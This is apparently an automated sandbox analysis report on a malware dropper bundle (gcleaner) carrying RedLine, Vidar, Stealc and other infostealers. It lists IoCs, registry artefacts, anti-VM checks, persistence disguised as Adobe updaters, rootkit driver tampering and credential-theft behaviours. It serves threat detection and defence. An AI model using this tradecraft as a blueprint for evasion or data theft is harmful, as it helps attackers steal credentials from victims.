gcleaner | 298882eef447afb08c134245d29d689feb30431a4c8595da619f2038f6d8b615

Windows Service

T1543.003

Processes:

setup.exeCzvCj0FEbiMieZehO5NAjU6Y.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	setup.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1"	CzvCj0FEbiMieZehO5NAjU6Y.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1452-305-0x0000000000400000-0x0000000000452000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Socks5Systemz
Socks5Systemz is a botnet written in C++.
botnet socks5systemz
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

evasion

Query Registry

Virtualization/Sandbox Evasion

T1497

Processes:

CzvCj0FEbiMieZehO5NAjU6Y.exemJkh_vBPKYWlrKhfwjZe_fEy.exeCUHeVRB27PX1VvaDsknUfd39.exesetup.exev34VMN90gdbiJnmN2N9A.exesetup.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	CzvCj0FEbiMieZehO5NAjU6Y.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	mJkh_vBPKYWlrKhfwjZe_fEy.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	CUHeVRB27PX1VvaDsknUfd39.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	v34VMN90gdbiJnmN2N9A.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	setup.exe

Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

194 3756 rundll32.exe
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

5744 netsh.exe
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
194	3756	rundll32.exe

pid	process
5744	netsh.exe

Checks BIOS information in registry 2 TTPs 14 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

setup.exeCzvCj0FEbiMieZehO5NAjU6Y.exemJkh_vBPKYWlrKhfwjZe_fEy.exeInstall.exesetup.exerundll32.exev34VMN90gdbiJnmN2N9A.exeCUHeVRB27PX1VvaDsknUfd39.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	CzvCj0FEbiMieZehO5NAjU6Y.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	mJkh_vBPKYWlrKhfwjZe_fEy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	CzvCj0FEbiMieZehO5NAjU6Y.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	mJkh_vBPKYWlrKhfwjZe_fEy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	v34VMN90gdbiJnmN2N9A.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	v34VMN90gdbiJnmN2N9A.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	CUHeVRB27PX1VvaDsknUfd39.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	CUHeVRB27PX1VvaDsknUfd39.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	setup.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WhLgyvu.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Control Panel\International\Geo\Nation WhLgyvu.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Control Panel\International\Geo\Nation	WhLgyvu.exe

Executes dropped EXE 37 IoCs

Processes:

jr4FrI9_X7jQLPHGvjPB4osL.exeIn28aT6OEzBYJk5VrZkWeJVJ.exeCUHeVRB27PX1VvaDsknUfd39.exeyRKFOkGG5AfemDqdjD0Ia_JB.exeJDUkgOFuQfv8olOEYHeUtZyb.exeBAbVtn3t4fM1oAMPrrnfkoTm.exeB5DnhFsDXUm0GjlatykVFhd5.exeEL0V9jsicQkwu5y5A3tv3gtV.exeEVRLEFHpACwBC7LNv6ChLne3.exeCzvCj0FEbiMieZehO5NAjU6Y.exeUo565YYjVS0blKWqp_vGqUmK.exeKv2hzaDcjRGUD1nawK5WxXFL.exeQRRkU2L9KM3jIB30lgkiKr7E.exemJkh_vBPKYWlrKhfwjZe_fEy.exel0GYgdTIEqcOpBSBqDB_SP8p.exeis-AE9EM.tmpInstall.exethreekingsoftvideo.exethreekingsoftvideo.exev34VMN90gdbiJnmN2N9A.exedckuybanmlgp.exeB5DnhFsDXUm0GjlatykVFhd5.exeZGNIdNY.execsrss.exeinjector.exewindefender.exewindefender.exeWhLgyvu.exev34VMN90gdbiJnmN2N9A.exeiTYVFkMjmhiHGHjan9fR.exetps1VzfXq5Mcx5uJvDrHkokV.exetps1VzfXq5Mcx5uJvDrHkokV.exedcb505dc2b9d8aac05f4ca0727f5eadb.exewup.execsrss.exe713674d5e968cbe2102394be0b2bae6f.exe1bf850b4d9587c1017a75a47680584c4.exe

pid	process
1080	jr4FrI9_X7jQLPHGvjPB4osL.exe
4752	In28aT6OEzBYJk5VrZkWeJVJ.exe
244	CUHeVRB27PX1VvaDsknUfd39.exe
4012	yRKFOkGG5AfemDqdjD0Ia_JB.exe
3876	JDUkgOFuQfv8olOEYHeUtZyb.exe
3992	BAbVtn3t4fM1oAMPrrnfkoTm.exe
1568	B5DnhFsDXUm0GjlatykVFhd5.exe
2816	EL0V9jsicQkwu5y5A3tv3gtV.exe
1344	EVRLEFHpACwBC7LNv6ChLne3.exe
3948	CzvCj0FEbiMieZehO5NAjU6Y.exe
2056	Uo565YYjVS0blKWqp_vGqUmK.exe
3920	Kv2hzaDcjRGUD1nawK5WxXFL.exe
2856	QRRkU2L9KM3jIB30lgkiKr7E.exe
2104	mJkh_vBPKYWlrKhfwjZe_fEy.exe
3492	l0GYgdTIEqcOpBSBqDB_SP8p.exe
4772	is-AE9EM.tmp
4168	Install.exe
3292	threekingsoftvideo.exe
1824	threekingsoftvideo.exe
2180	v34VMN90gdbiJnmN2N9A.exe
5752	dckuybanmlgp.exe
1476	B5DnhFsDXUm0GjlatykVFhd5.exe
1664	ZGNIdNY.exe
5784	csrss.exe
2152	injector.exe
2504	windefender.exe
6064	windefender.exe
1748	WhLgyvu.exe
2188	v34VMN90gdbiJnmN2N9A.exe
4956	iTYVFkMjmhiHGHjan9fR.exe
2204	tps1VzfXq5Mcx5uJvDrHkokV.exe
5384	tps1VzfXq5Mcx5uJvDrHkokV.exe
1528	dcb505dc2b9d8aac05f4ca0727f5eadb.exe
1940	wup.exe
4920	csrss.exe
5688	713674d5e968cbe2102394be0b2bae6f.exe
1032	1bf850b4d9587c1017a75a47680584c4.exe

Loads dropped DLL 5 IoCs

Processes:

is-AE9EM.tmpEVRLEFHpACwBC7LNv6ChLne3.exejr4FrI9_X7jQLPHGvjPB4osL.exerundll32.exe

pid process

4772 is-AE9EM.tmp
1344 EVRLEFHpACwBC7LNv6ChLne3.exe
1344 EVRLEFHpACwBC7LNv6ChLne3.exe
1080 jr4FrI9_X7jQLPHGvjPB4osL.exe
3756 rundll32.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
4772	is-AE9EM.tmp
1344	EVRLEFHpACwBC7LNv6ChLne3.exe
1344	EVRLEFHpACwBC7LNv6ChLne3.exe
1080	jr4FrI9_X7jQLPHGvjPB4osL.exe
3756	rundll32.exe

Themida packer 22 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/memory/1688-0-0x00007FF7FDB40000-0x00007FF7FE3A4000-memory.dmp	themida
behavioral1/memory/1688-4-0x00007FF7FDB40000-0x00007FF7FE3A4000-memory.dmp	themida
behavioral1/memory/1688-7-0x00007FF7FDB40000-0x00007FF7FE3A4000-memory.dmp	themida
behavioral1/memory/1688-8-0x00007FF7FDB40000-0x00007FF7FE3A4000-memory.dmp	themida
behavioral1/memory/1688-9-0x00007FF7FDB40000-0x00007FF7FE3A4000-memory.dmp	themida
behavioral1/memory/1688-10-0x00007FF7FDB40000-0x00007FF7FE3A4000-memory.dmp	themida
behavioral1/memory/1688-11-0x00007FF7FDB40000-0x00007FF7FE3A4000-memory.dmp	themida
behavioral1/memory/1688-12-0x00007FF7FDB40000-0x00007FF7FE3A4000-memory.dmp	themida
behavioral1/memory/1688-21-0x00007FF7FDB40000-0x00007FF7FE3A4000-memory.dmp	themida
behavioral1/memory/1688-120-0x00007FF7FDB40000-0x00007FF7FE3A4000-memory.dmp	themida
behavioral1/memory/1688-130-0x00007FF7FDB40000-0x00007FF7FE3A4000-memory.dmp	themida
behavioral1/memory/1688-230-0x00007FF7FDB40000-0x00007FF7FE3A4000-memory.dmp	themida
C:\Users\Admin\Documents\SimpleAdobe\CzvCj0FEbiMieZehO5NAjU6Y.exe	themida
behavioral1/memory/3948-291-0x0000000000870000-0x0000000000E3B000-memory.dmp	themida
behavioral1/memory/3948-309-0x0000000000870000-0x0000000000E3B000-memory.dmp	themida
behavioral1/memory/3948-312-0x0000000000870000-0x0000000000E3B000-memory.dmp	themida
behavioral1/memory/3948-332-0x0000000000870000-0x0000000000E3B000-memory.dmp	themida
behavioral1/memory/3948-337-0x0000000000870000-0x0000000000E3B000-memory.dmp	themida
behavioral1/memory/3948-365-0x0000000000870000-0x0000000000E3B000-memory.dmp	themida
behavioral1/memory/3948-357-0x0000000000870000-0x0000000000E3B000-memory.dmp	themida
behavioral1/memory/3948-371-0x0000000000870000-0x0000000000E3B000-memory.dmp	themida
behavioral1/memory/1688-426-0x00007FF7FDB40000-0x00007FF7FE3A4000-memory.dmp	themida

Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 91.211.247.248

description	ioc
Destination IP	91.211.247.248

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\Documents\SimpleAdobe\Uo565YYjVS0blKWqp_vGqUmK.exe	vmprotect
behavioral1/memory/2056-368-0x00000000005F0000-0x0000000000EDE000-memory.dmp	vmprotect
behavioral1/memory/2056-478-0x00000000005F0000-0x0000000000EDE000-memory.dmp	vmprotect

Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs

collection

Email Collection

T1114

Processes:

RegAsm.exemJkh_vBPKYWlrKhfwjZe_fEy.exeCUHeVRB27PX1VvaDsknUfd39.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	mJkh_vBPKYWlrKhfwjZe_fEy.exe
Key opened	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	CUHeVRB27PX1VvaDsknUfd39.exe
Key opened	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	CUHeVRB27PX1VvaDsknUfd39.exe
Key opened	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe
Key opened	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	CUHeVRB27PX1VvaDsknUfd39.exe
Key opened	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	mJkh_vBPKYWlrKhfwjZe_fEy.exe
Key opened	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	mJkh_vBPKYWlrKhfwjZe_fEy.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

Processes:

CUHeVRB27PX1VvaDsknUfd39.exeB5DnhFsDXUm0GjlatykVFhd5.execsrss.exemJkh_vBPKYWlrKhfwjZe_fEy.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\\AdobeUpdaterV202.exe"	CUHeVRB27PX1VvaDsknUfd39.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	B5DnhFsDXUm0GjlatykVFhd5.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\\AdobeUpdaterV1.exe"	mJkh_vBPKYWlrKhfwjZe_fEy.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-801878912-692986033-442676226-1000\Software\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV1_5fc4ccc1a69cead8abaf9c75121d8fec = "C:\\Users\\Admin\\AppData\\Local\\AdobeUpdaterV1_5fc4ccc1a69cead8abaf9c75121d8fec\\AdobeUpdaterV1.exe"	mJkh_vBPKYWlrKhfwjZe_fEy.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

Processes:

setup.exeCzvCj0FEbiMieZehO5NAjU6Y.exemJkh_vBPKYWlrKhfwjZe_fEy.exeCUHeVRB27PX1VvaDsknUfd39.exesetup.exev34VMN90gdbiJnmN2N9A.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	CzvCj0FEbiMieZehO5NAjU6Y.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	mJkh_vBPKYWlrKhfwjZe_fEy.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	CUHeVRB27PX1VvaDsknUfd39.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	v34VMN90gdbiJnmN2N9A.exe

Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Drops Chrome extension 3 IoCs

Processes:

CzvCj0FEbiMieZehO5NAjU6Y.exeWhLgyvu.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ejjnniijcjakoaghpedjpcfkoclplenf\3.0_0\manifest.json	CzvCj0FEbiMieZehO5NAjU6Y.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	WhLgyvu.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	WhLgyvu.exe

Drops desktop.ini file(s) 1 IoCs

Processes:

WhLgyvu.exe

description ioc process

File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini WhLgyvu.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service
T1102

Processes:

flow ioc

101 iplogger.org
16 bitbucket.org
21 bitbucket.org
36 bitbucket.org
48 bitbucket.org
49 iplogger.org

description	ioc	process
File opened for modification	C:\$RECYCLE.BIN\S-1-5-18\desktop.ini	WhLgyvu.exe

flow	ioc
101	iplogger.org
16	bitbucket.org
21	bitbucket.org
36	bitbucket.org
48	bitbucket.org
49	iplogger.org

Looks up external IP address via web service 13 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
17	ipinfo.io
52	ipinfo.io
124	ipinfo.io
4	api.myip.com
4	ipinfo.io
5	api.myip.com
135	ipinfo.io
228	ipinfo.io
6	ipinfo.io
7	ipinfo.io
127	ipinfo.io
106	api.myip.com
108	ipinfo.io

Manipulates WinMon driver. 1 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMon csrss.exe
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMonFS csrss.exe

description	ioc	process
File opened for modification	\??\WinMon	csrss.exe

description	ioc	process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 48 IoCs

Processes:

powershell.exeZGNIdNY.exepowershell.exeCzvCj0FEbiMieZehO5NAjU6Y.exepowershell.exeWhLgyvu.exepowershell.exesetup.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	ZGNIdNY.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	CzvCj0FEbiMieZehO5NAjU6Y.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5	WhLgyvu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies	WhLgyvu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	WhLgyvu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91	WhLgyvu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy	setup.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	setup.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	WhLgyvu.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	setup.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	setup.exe
File opened for modification	C:\Windows\SysWOW64\GroupPolicy\gpt.ini	CzvCj0FEbiMieZehO5NAjU6Y.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5	WhLgyvu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15	WhLgyvu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	CzvCj0FEbiMieZehO5NAjU6Y.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE	WhLgyvu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15	WhLgyvu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306	WhLgyvu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	WhLgyvu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	WhLgyvu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751	WhLgyvu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751	WhLgyvu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15	WhLgyvu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	WhLgyvu.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	WhLgyvu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\System32\GroupPolicy	CzvCj0FEbiMieZehO5NAjU6Y.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	WhLgyvu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91	WhLgyvu.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	ZGNIdNY.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	WhLgyvu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	WhLgyvu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306	WhLgyvu.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15	WhLgyvu.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

Processes:

setup.exeCzvCj0FEbiMieZehO5NAjU6Y.exemJkh_vBPKYWlrKhfwjZe_fEy.exeCUHeVRB27PX1VvaDsknUfd39.exesetup.exev34VMN90gdbiJnmN2N9A.exe

pid	process
1688	setup.exe
3948	CzvCj0FEbiMieZehO5NAjU6Y.exe
2104	mJkh_vBPKYWlrKhfwjZe_fEy.exe
244	CUHeVRB27PX1VvaDsknUfd39.exe
1460	setup.exe
2188	v34VMN90gdbiJnmN2N9A.exe

Suspicious use of SetThreadContext 9 IoCs

Processes:

QRRkU2L9KM3jIB30lgkiKr7E.exeJDUkgOFuQfv8olOEYHeUtZyb.exeBAbVtn3t4fM1oAMPrrnfkoTm.exeIn28aT6OEzBYJk5VrZkWeJVJ.exev34VMN90gdbiJnmN2N9A.exejr4FrI9_X7jQLPHGvjPB4osL.exedckuybanmlgp.exeiTYVFkMjmhiHGHjan9fR.exe

description	pid	process	target process
PID 2856 set thread context of 1700	2856	QRRkU2L9KM3jIB30lgkiKr7E.exe	RegAsm.exe
PID 3876 set thread context of 1452	3876	JDUkgOFuQfv8olOEYHeUtZyb.exe	RegAsm.exe
PID 3992 set thread context of 2124	3992	BAbVtn3t4fM1oAMPrrnfkoTm.exe	RegAsm.exe
PID 4752 set thread context of 4832	4752	In28aT6OEzBYJk5VrZkWeJVJ.exe	RegAsm.exe
PID 2180 set thread context of 5936	2180	v34VMN90gdbiJnmN2N9A.exe	RegAsm.exe
